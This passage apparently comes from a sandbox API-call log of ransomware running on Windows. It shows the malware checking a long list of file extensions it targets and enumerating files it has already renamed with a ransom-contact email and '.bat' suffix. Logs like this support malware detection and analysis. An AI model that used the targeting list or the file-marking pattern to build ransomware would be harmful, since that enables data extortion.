(lpString=".backup") returned 7 [0155.750] lstrcmpiW (lpString1=".backup", lpString2="li].bat") returned -1 [0155.750] lstrlenW (lpString=".bak") returned 4 [0155.750] lstrcmpiW (lpString1=".bak", lpString2=".bat") returned -1 [0155.750] lstrlenW (lpString=".bay") returned 4 [0155.750] lstrcmpiW (lpString1=".bay", lpString2=".bat") returned 1 [0155.750] lstrlenW (lpString=".bd") returned 3 [0155.750] lstrcmpiW (lpString1=".bd", lpString2="bat") returned -1 [0155.750] lstrlenW (lpString=".bin") returned 4 [0155.750] lstrcmpiW (lpString1=".bin", lpString2=".bat") returned 1 [0155.750] lstrlenW (lpString=".bmp") returned 4 [0155.750] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0155.750] lstrlenW (lpString=".bz2") returned 4 [0155.750] lstrcmpiW (lpString1=".bz2", lpString2=".bat") returned 1 [0155.750] lstrlenW (lpString=".c") returned 2 [0155.750] lstrcmpiW (lpString1=".c", lpString2="at") returned -1 [0155.750] lstrlenW (lpString=".cdr") returned 4 [0155.751] lstrcmpiW (lpString1=".cdr", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".cer") returned 4 [0155.751] lstrcmpiW (lpString1=".cer", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".cf") returned 3 [0155.751] lstrcmpiW (lpString1=".cf", lpString2="bat") returned -1 [0155.751] lstrlenW (lpString=".cfc") returned 4 [0155.751] lstrcmpiW (lpString1=".cfc", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".cfm") returned 4 [0155.751] lstrcmpiW (lpString1=".cfm", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".cfml") returned 5 [0155.751] lstrcmpiW (lpString1=".cfml", lpString2="].bat") returned -1 [0155.751] lstrlenW (lpString=".cfu") returned 4 [0155.751] lstrcmpiW (lpString1=".cfu", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".chm") returned 4 [0155.751] lstrcmpiW (lpString1=".chm", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".cin") returned 4 [0155.751] lstrcmpiW (lpString1=".cin", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".class") returned 6 [0155.751] lstrcmpiW (lpString1=".class", lpString2="i].bat") returned -1 [0155.751] lstrlenW (lpString=".clx") returned 4 [0155.751] lstrcmpiW (lpString1=".clx", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".config") returned 7 [0155.751] lstrcmpiW (lpString1=".config", lpString2="li].bat") returned -1 [0155.751] lstrlenW (lpString=".cpp") returned 4 [0155.751] lstrcmpiW (lpString1=".cpp", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".cr2") returned 4 [0155.751] lstrcmpiW (lpString1=".cr2", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".crt") returned 4 [0155.751] lstrcmpiW (lpString1=".crt", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".crw") returned 4 [0155.751] lstrcmpiW (lpString1=".crw", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".cs") returned 3 [0155.751] lstrcmpiW (lpString1=".cs", lpString2="bat") returned -1 [0155.751] lstrlenW (lpString=".css") returned 4 [0155.751] lstrcmpiW (lpString1=".css", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".csv") returned 4 [0155.751] lstrcmpiW (lpString1=".csv", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".cub") returned 4 [0155.751] lstrcmpiW (lpString1=".cub", lpString2=".bat") returned 1 [0155.751] lstrlenW (lpString=".dae") returned 4 [0155.751] lstrcmpiW (lpString1=".dae", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".dat") returned 4 [0155.752] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".db") returned 3 [0155.752] lstrcmpiW (lpString1=".db", lpString2="bat") returned -1 [0155.752] lstrlenW (lpString=".dbf") returned 4 [0155.752] lstrcmpiW (lpString1=".dbf", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".dbx") returned 4 [0155.752] lstrcmpiW (lpString1=".dbx", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".dc3") returned 4 [0155.752] lstrcmpiW (lpString1=".dc3", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".dcm") returned 4 [0155.752] lstrcmpiW (lpString1=".dcm", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".dcr") returned 4 [0155.752] lstrcmpiW (lpString1=".dcr", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".der") returned 4 [0155.752] lstrcmpiW (lpString1=".der", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".dib") returned 4 [0155.752] lstrcmpiW (lpString1=".dib", lpString2=".bat") returned 1 [0155.752] lstrlenW (lpString=".dic") returned 4 [0155.752] lstrcmpiW (lpString1=".dic", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".dif") returned 4 [0155.753] lstrcmpiW (lpString1=".dif", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".divx") returned 5 [0155.753] lstrcmpiW (lpString1=".divx", lpString2="].bat") returned -1 [0155.753] lstrlenW (lpString=".djvu") returned 5 [0155.753] lstrcmpiW (lpString1=".djvu", lpString2="].bat") returned -1 [0155.753] lstrlenW (lpString=".dng") returned 4 [0155.753] lstrcmpiW (lpString1=".dng", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".doc") returned 4 [0155.753] lstrcmpiW (lpString1=".doc", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".docm") returned 5 [0155.753] lstrcmpiW (lpString1=".docm", lpString2="].bat") returned -1 [0155.753] lstrlenW (lpString=".docx") returned 5 [0155.753] lstrcmpiW (lpString1=".docx", lpString2="].bat") returned -1 [0155.753] lstrlenW (lpString=".dot") returned 4 [0155.753] lstrcmpiW (lpString1=".dot", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".dotm") returned 5 [0155.753] lstrcmpiW (lpString1=".dotm", lpString2="].bat") returned -1 [0155.753] lstrlenW (lpString=".dotx") returned 5 [0155.753] lstrcmpiW (lpString1=".dotx", lpString2="].bat") returned -1 [0155.753] lstrlenW (lpString=".dpx") returned 4 [0155.753] lstrcmpiW (lpString1=".dpx", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".dqy") returned 4 [0155.753] lstrcmpiW (lpString1=".dqy", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".dsn") returned 4 [0155.753] lstrcmpiW (lpString1=".dsn", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".dt") returned 3 [0155.753] lstrcmpiW (lpString1=".dt", lpString2="bat") returned -1 [0155.753] lstrlenW (lpString=".dtd") returned 4 [0155.753] lstrcmpiW (lpString1=".dtd", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".dwg") returned 4 [0155.753] lstrcmpiW (lpString1=".dwg", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".dwt") returned 4 [0155.753] lstrcmpiW (lpString1=".dwt", lpString2=".bat") returned 1 [0155.753] lstrlenW (lpString=".dx") returned 3 [0155.753] lstrcmpiW (lpString1=".dx", lpString2="bat") returned -1 [0155.754] lstrlenW (lpString=".dxf") returned 4 [0155.754] lstrcmpiW (lpString1=".dxf", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".edml") returned 5 [0155.754] lstrcmpiW (lpString1=".edml", lpString2="].bat") returned -1 [0155.754] lstrlenW (lpString=".efd") returned 4 [0155.754] lstrcmpiW (lpString1=".efd", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".elf") returned 4 [0155.754] lstrcmpiW (lpString1=".elf", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".emf") returned 4 [0155.754] lstrcmpiW (lpString1=".emf", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".emz") returned 4 [0155.754] lstrcmpiW (lpString1=".emz", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".epf") returned 4 [0155.754] lstrcmpiW (lpString1=".epf", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".eps") returned 4 [0155.754] lstrcmpiW (lpString1=".eps", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".epsf") returned 5 [0155.754] lstrcmpiW (lpString1=".epsf", lpString2="].bat") returned -1 [0155.754] lstrlenW (lpString=".epsp") returned 5 [0155.754] lstrcmpiW (lpString1=".epsp", lpString2="].bat") returned -1 [0155.754] lstrlenW (lpString=".erf") returned 4 [0155.754] lstrcmpiW (lpString1=".erf", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".exr") returned 4 [0155.754] lstrcmpiW (lpString1=".exr", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".f4v") returned 4 [0155.754] lstrcmpiW (lpString1=".f4v", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".fido") returned 5 [0155.754] lstrcmpiW (lpString1=".fido", lpString2="].bat") returned -1 [0155.754] lstrlenW (lpString=".flm") returned 4 [0155.754] lstrcmpiW (lpString1=".flm", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".flv") returned 4 [0155.754] lstrcmpiW (lpString1=".flv", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".frm") returned 4 [0155.754] lstrcmpiW (lpString1=".frm", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".fxg") returned 4 [0155.754] lstrcmpiW (lpString1=".fxg", lpString2=".bat") returned 1 [0155.754] lstrlenW (lpString=".geo") returned 4 [0155.754] lstrcmpiW (lpString1=".geo", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".gif") returned 4 [0155.755] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".grs") returned 4 [0155.755] lstrcmpiW (lpString1=".grs", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".gz") returned 3 [0155.755] lstrcmpiW (lpString1=".gz", lpString2="bat") returned -1 [0155.755] lstrlenW (lpString=".h") returned 2 [0155.755] lstrcmpiW (lpString1=".h", lpString2="at") returned -1 [0155.755] lstrlenW (lpString=".hdr") returned 4 [0155.755] lstrcmpiW (lpString1=".hdr", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".hpp") returned 4 [0155.755] lstrcmpiW (lpString1=".hpp", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".hta") returned 4 [0155.755] lstrcmpiW (lpString1=".hta", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".htc") returned 4 [0155.755] lstrcmpiW (lpString1=".htc", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".htm") returned 4 [0155.755] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".html") returned 5 [0155.755] lstrcmpiW (lpString1=".html", lpString2="].bat") returned -1 [0155.755] lstrlenW (lpString=".icb") returned 4 [0155.755] lstrcmpiW (lpString1=".icb", lpString2=".bat") returned 1 [0155.755] lstrlenW (lpString=".ics") returned 4 [0155.756] lstrcmpiW (lpString1=".ics", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".iff") returned 4 [0155.756] lstrcmpiW (lpString1=".iff", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".inc") returned 4 [0155.756] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".indd") returned 5 [0155.756] lstrcmpiW (lpString1=".indd", lpString2="].bat") returned -1 [0155.756] lstrlenW (lpString=".ini") returned 4 [0155.756] lstrcmpiW (lpString1=".ini", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".iqy") returned 4 [0155.756] lstrcmpiW (lpString1=".iqy", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".j2c") returned 4 [0155.756] lstrcmpiW (lpString1=".j2c", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".j2k") returned 4 [0155.756] lstrcmpiW (lpString1=".j2k", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".java") returned 5 [0155.756] lstrcmpiW (lpString1=".java", lpString2="].bat") returned -1 [0155.756] lstrlenW (lpString=".jp2") returned 4 [0155.756] lstrcmpiW (lpString1=".jp2", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".jpc") returned 4 [0155.756] lstrcmpiW (lpString1=".jpc", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".jpe") returned 4 [0155.756] lstrcmpiW (lpString1=".jpe", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".jpeg") returned 5 [0155.756] lstrcmpiW (lpString1=".jpeg", lpString2="].bat") returned -1 [0155.756] lstrlenW (lpString=".jpf") returned 4 [0155.756] lstrcmpiW (lpString1=".jpf", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".jpg") returned 4 [0155.756] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".jpx") returned 4 [0155.756] lstrcmpiW (lpString1=".jpx", lpString2=".bat") returned 1 [0155.756] lstrlenW (lpString=".js") returned 3 [0155.757] lstrcmpiW (lpString1=".js", lpString2="bat") returned -1 [0155.757] lstrlenW (lpString=".jsf") returned 4 [0155.757] lstrcmpiW (lpString1=".jsf", lpString2=".bat") returned 1 [0155.757] lstrlenW (lpString=".json") returned 5 [0155.757] lstrcmpiW (lpString1=".json", lpString2="].bat") returned -1 [0155.757] lstrlenW (lpString=".jsp") returned 4 [0155.757] lstrcmpiW (lpString1=".jsp", lpString2=".bat") returned 1 [0155.757] lstrlenW (lpString=".kdc") returned 4 [0155.757] lstrcmpiW (lpString1=".kdc", lpString2=".bat") returned 1 [0155.757] lstrlenW (lpString=".kmz") returned 4 [0155.757] lstrcmpiW (lpString1=".kmz", lpString2=".bat") returned 1 [0155.757] lstrlenW (lpString=".kwm") returned 4 [0155.757] lstrcmpiW (lpString1=".kwm", lpString2=".bat") returned 1 [0155.757] lstrlenW (lpString=".lasso") returned 6 [0155.757] lstrcmpiW (lpString1=".lasso", lpString2="i].bat") returned -1 [0155.757] lstrlenW (lpString=".lbi") returned 4 [0155.757] lstrcmpiW (lpString1=".lbi", lpString2=".bat") returned 1 [0155.757] lstrlenW (lpString=".lgf") returned 4 [0155.757] lstrcmpiW (lpString1=".lgf", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".lgp") returned 4 [0155.758] lstrcmpiW (lpString1=".lgp", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".log") returned 4 [0155.758] lstrcmpiW (lpString1=".log", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".m1v") returned 4 [0155.758] lstrcmpiW (lpString1=".m1v", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".m4a") returned 4 [0155.758] lstrcmpiW (lpString1=".m4a", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".m4v") returned 4 [0155.758] lstrcmpiW (lpString1=".m4v", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".max") returned 4 [0155.758] lstrcmpiW (lpString1=".max", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".md") returned 3 [0155.758] lstrcmpiW (lpString1=".md", lpString2="bat") returned -1 [0155.758] lstrlenW (lpString=".mda") returned 4 [0155.758] lstrcmpiW (lpString1=".mda", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".mdb") returned 4 [0155.758] lstrcmpiW (lpString1=".mdb", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".mde") returned 4 [0155.758] lstrcmpiW (lpString1=".mde", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".mdf") returned 4 [0155.758] lstrcmpiW (lpString1=".mdf", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".mdw") returned 4 [0155.758] lstrcmpiW (lpString1=".mdw", lpString2=".bat") returned 1 [0155.758] lstrlenW (lpString=".mef") returned 4 [0155.758] lstrcmpiW (lpString1=".mef", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mft") returned 4 [0155.759] lstrcmpiW (lpString1=".mft", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mfw") returned 4 [0155.759] lstrcmpiW (lpString1=".mfw", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mht") returned 4 [0155.759] lstrcmpiW (lpString1=".mht", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mhtml") returned 6 [0155.759] lstrcmpiW (lpString1=".mhtml", lpString2="i].bat") returned -1 [0155.759] lstrlenW (lpString=".mka") returned 4 [0155.759] lstrcmpiW (lpString1=".mka", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mkidx") returned 6 [0155.759] lstrcmpiW (lpString1=".mkidx", lpString2="i].bat") returned -1 [0155.759] lstrlenW (lpString=".mkv") returned 4 [0155.759] lstrcmpiW (lpString1=".mkv", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mos") returned 4 [0155.759] lstrcmpiW (lpString1=".mos", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mov") returned 4 [0155.759] lstrcmpiW (lpString1=".mov", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mp3") returned 4 [0155.759] lstrcmpiW (lpString1=".mp3", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mp4") returned 4 [0155.759] lstrcmpiW (lpString1=".mp4", lpString2=".bat") returned 1 [0155.759] lstrlenW (lpString=".mpeg") returned 5 [0155.759] lstrcmpiW (lpString1=".mpeg", lpString2="].bat") returned -1 [0155.759] lstrlenW (lpString=".mpg") returned 4 [0155.759] lstrcmpiW (lpString1=".mpg", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".mpv") returned 4 [0155.761] lstrcmpiW (lpString1=".mpv", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".mrw") returned 4 [0155.761] lstrcmpiW (lpString1=".mrw", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".msg") returned 4 [0155.761] lstrcmpiW (lpString1=".msg", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".mxl") returned 4 [0155.761] lstrcmpiW (lpString1=".mxl", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".myd") returned 4 [0155.761] lstrcmpiW (lpString1=".myd", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".myi") returned 4 [0155.761] lstrcmpiW (lpString1=".myi", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".nef") returned 4 [0155.761] lstrcmpiW (lpString1=".nef", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".nrw") returned 4 [0155.761] lstrcmpiW (lpString1=".nrw", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".obj") returned 4 [0155.761] lstrcmpiW (lpString1=".obj", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".odb") returned 4 [0155.761] lstrcmpiW (lpString1=".odb", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".odc") returned 4 [0155.761] lstrcmpiW (lpString1=".odc", lpString2=".bat") returned 1 [0155.761] lstrlenW (lpString=".odm") returned 4 [0155.762] lstrcmpiW (lpString1=".odm", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".odp") returned 4 [0155.762] lstrcmpiW (lpString1=".odp", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".ods") returned 4 [0155.762] lstrcmpiW (lpString1=".ods", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".oft") returned 4 [0155.762] lstrcmpiW (lpString1=".oft", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".one") returned 4 [0155.762] lstrcmpiW (lpString1=".one", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".onepkg") returned 7 [0155.762] lstrcmpiW (lpString1=".onepkg", lpString2="li].bat") returned -1 [0155.762] lstrlenW (lpString=".onetoc2") returned 8 [0155.762] lstrcmpiW (lpString1=".onetoc2", lpString2=".li].bat") returned 1 [0155.762] lstrlenW (lpString=".opt") returned 4 [0155.762] lstrcmpiW (lpString1=".opt", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".oqy") returned 4 [0155.762] lstrcmpiW (lpString1=".oqy", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".orf") returned 4 [0155.762] lstrcmpiW (lpString1=".orf", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".p12") returned 4 [0155.762] lstrcmpiW (lpString1=".p12", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".p7b") returned 4 [0155.762] lstrcmpiW (lpString1=".p7b", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".p7c") returned 4 [0155.762] lstrcmpiW (lpString1=".p7c", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".pam") returned 4 [0155.762] lstrcmpiW (lpString1=".pam", lpString2=".bat") returned 1 [0155.762] lstrlenW (lpString=".pbm") returned 4 [0155.764] lstrcmpiW (lpString1=".pbm", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pct") returned 4 [0155.764] lstrcmpiW (lpString1=".pct", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pcx") returned 4 [0155.764] lstrcmpiW (lpString1=".pcx", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pdd") returned 4 [0155.764] lstrcmpiW (lpString1=".pdd", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pdf") returned 4 [0155.764] lstrcmpiW (lpString1=".pdf", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pdp") returned 4 [0155.764] lstrcmpiW (lpString1=".pdp", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pef") returned 4 [0155.764] lstrcmpiW (lpString1=".pef", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pem") returned 4 [0155.764] lstrcmpiW (lpString1=".pem", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pff") returned 4 [0155.764] lstrcmpiW (lpString1=".pff", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pfm") returned 4 [0155.764] lstrcmpiW (lpString1=".pfm", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pfx") returned 4 [0155.764] lstrcmpiW (lpString1=".pfx", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".pgm") returned 4 [0155.764] lstrcmpiW (lpString1=".pgm", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".php") returned 4 [0155.764] lstrcmpiW (lpString1=".php", lpString2=".bat") returned 1 [0155.764] lstrlenW (lpString=".php3") returned 5 [0155.765] lstrcmpiW (lpString1=".php3", lpString2="].bat") returned -1 [0155.765] lstrlenW (lpString=".php4") returned 5 [0155.765] lstrcmpiW (lpString1=".php4", lpString2="].bat") returned -1 [0155.765] lstrlenW (lpString=".php5") returned 5 [0155.765] lstrcmpiW (lpString1=".php5", lpString2="].bat") returned -1 [0155.765] lstrlenW (lpString=".phtml") returned 6 [0155.765] lstrcmpiW (lpString1=".phtml", lpString2="i].bat") returned -1 [0155.765] lstrlenW (lpString=".pict") returned 5 [0155.765] lstrcmpiW (lpString1=".pict", lpString2="].bat") returned -1 [0155.765] lstrlenW (lpString=".pl") returned 3 [0155.765] lstrcmpiW (lpString1=".pl", lpString2="bat") returned -1 [0155.765] lstrlenW (lpString=".pls") returned 4 [0155.765] lstrcmpiW (lpString1=".pls", lpString2=".bat") returned 1 [0155.765] lstrlenW (lpString=".pm") returned 3 [0155.765] lstrcmpiW (lpString1=".pm", lpString2="bat") returned -1 [0155.765] lstrlenW (lpString=".png") returned 4 [0155.765] lstrcmpiW (lpString1=".png", lpString2=".bat") returned 1 [0155.765] lstrlenW (lpString=".pnm") returned 4 [0155.765] lstrcmpiW (lpString1=".pnm", lpString2=".bat") returned 1 [0155.765] lstrlenW (lpString=".pot") returned 4 [0155.765] lstrcmpiW (lpString1=".pot", lpString2=".bat") returned 1 [0155.765] lstrlenW (lpString=".potm") returned 5 [0155.765] lstrcmpiW (lpString1=".potm", lpString2="].bat") returned -1 [0155.765] lstrlenW (lpString=".potx") returned 5 [0155.765] lstrcmpiW (lpString1=".potx", lpString2="].bat") returned -1 [0155.766] lstrlenW (lpString=".ppa") returned 4 [0155.766] lstrcmpiW (lpString1=".ppa", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".ppam") returned 5 [0155.766] lstrcmpiW (lpString1=".ppam", lpString2="].bat") returned -1 [0155.766] lstrlenW (lpString=".ppm") returned 4 [0155.766] lstrcmpiW (lpString1=".ppm", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".pps") returned 4 [0155.766] lstrcmpiW (lpString1=".pps", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".ppsm") returned 5 [0155.766] lstrcmpiW (lpString1=".ppsm", lpString2="].bat") returned -1 [0155.766] lstrlenW (lpString=".ppt") returned 4 [0155.766] lstrcmpiW (lpString1=".ppt", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".pptm") returned 5 [0155.766] lstrcmpiW (lpString1=".pptm", lpString2="].bat") returned -1 [0155.766] lstrlenW (lpString=".pptx") returned 5 [0155.766] lstrcmpiW (lpString1=".pptx", lpString2="].bat") returned -1 [0155.766] lstrlenW (lpString=".prn") returned 4 [0155.766] lstrcmpiW (lpString1=".prn", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".ps") returned 3 [0155.766] lstrcmpiW (lpString1=".ps", lpString2="bat") returned -1 [0155.766] lstrlenW (lpString=".psb") returned 4 [0155.766] lstrcmpiW (lpString1=".psb", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".psd") returned 4 [0155.766] lstrcmpiW (lpString1=".psd", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".pst") returned 4 [0155.766] lstrcmpiW (lpString1=".pst", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".ptx") returned 4 [0155.766] lstrcmpiW (lpString1=".ptx", lpString2=".bat") returned 1 [0155.766] lstrlenW (lpString=".pub") returned 4 [0155.767] lstrcmpiW (lpString1=".pub", lpString2=".bat") returned 1 [0155.767] lstrlenW (lpString=".pwm") returned 4 [0155.767] lstrcmpiW (lpString1=".pwm", lpString2=".bat") returned 1 [0155.767] lstrlenW (lpString=".pxr") returned 4 [0155.767] lstrcmpiW (lpString1=".pxr", lpString2=".bat") returned 1 [0155.767] lstrlenW (lpString=".py") returned 3 [0155.767] lstrcmpiW (lpString1=".py", lpString2="bat") returned -1 [0155.767] lstrlenW (lpString=".qt") returned 3 [0155.767] lstrcmpiW (lpString1=".qt", lpString2="bat") returned -1 [0155.767] lstrlenW (lpString=".r3d") returned 4 [0155.767] lstrcmpiW (lpString1=".r3d", lpString2=".bat") returned 1 [0155.767] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5d863b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5d863b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd670f91, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x11a86, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.767] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3e87bc, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3e87bc, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd3e87bc, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4258, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.767] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3e87bc, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3e87bc, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd3e87bc, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4258, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.768] FindClose (in: hFindFile=0x727d48 | out: hFindFile=0x727d48) returned 1 [0155.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0155.768] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, 